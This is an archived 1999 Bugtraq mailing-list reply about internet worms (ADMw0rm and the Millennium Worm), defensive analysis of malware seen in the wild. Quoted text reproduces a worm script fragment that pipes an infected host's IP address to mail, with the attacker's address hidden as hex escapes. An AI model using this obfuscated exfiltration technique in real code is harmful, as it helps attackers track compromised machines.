[11948] in bugtraq

home help back first fref pref prev next nref lref last post

Re: MW

daemon@ATHENA.MIT.EDU (Max Vision)
Tue Sep 21 13:57:58 1999

Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"; format=flowed
Message-Id:  <4.2.0.58.19990920012327.00a59c48@localhost>
Date:         Mon, 20 Sep 1999 02:45:59 -0700
Reply-To: Max Vision <vision@WHITEHATS.COM>
From: Max Vision <vision@WHITEHATS.COM>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <E11ON5h-0006DQ-00@devnull.xpert.com>

Hello,

I posted two short write-ups on recent Internet worms I've seen in the wild
(ADMw0rm and Millennium Worm).  http://whitehats.com/worms/.  From these
previous posts it looks like someone has launched a variation of the
Millennium Worm.

Max Vision

At 05:23 PM 9/7/1999 +0200, Adam Morrison wrote:
> > On Wed, 1 Sep 1999, Christian Koderer wrote:
> > > ./IP | mail `printf
> > > "\x62\x65\x75\x72\x70\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"`
> > > logout
> > > _EOF_
> >
> >
> > In case no one bothered figuring this one out, this translates to
> > 'beurp@hotmail.com'
> >
> > Apparently './IP' is a program it runs to figure out which IP it should
> > get the worm files from. Did you find a similarly named file?
>
>It's a worm; it gets the worm files from the last infected machine.
>`IP' returns the address of the machine that the copy of the worm
>is running on, and is used in the `cmd' grappling hook which
>apparently gets executed on compromised remote hosts.  Each time the
>worm infects a machine, it mails the IP address of that machine to
><beurp@hotmail.com>.
>
>Now, not to make any unfounded allegations, but this worm looks
>remarkably like ADMw0rm.  I wonder why it restarts named when first
>infecting a host, when it appears to also utilize several other
>vulnerabilites in order to get in.  Ho, hum.

home help back first fref pref prev next nref lref last post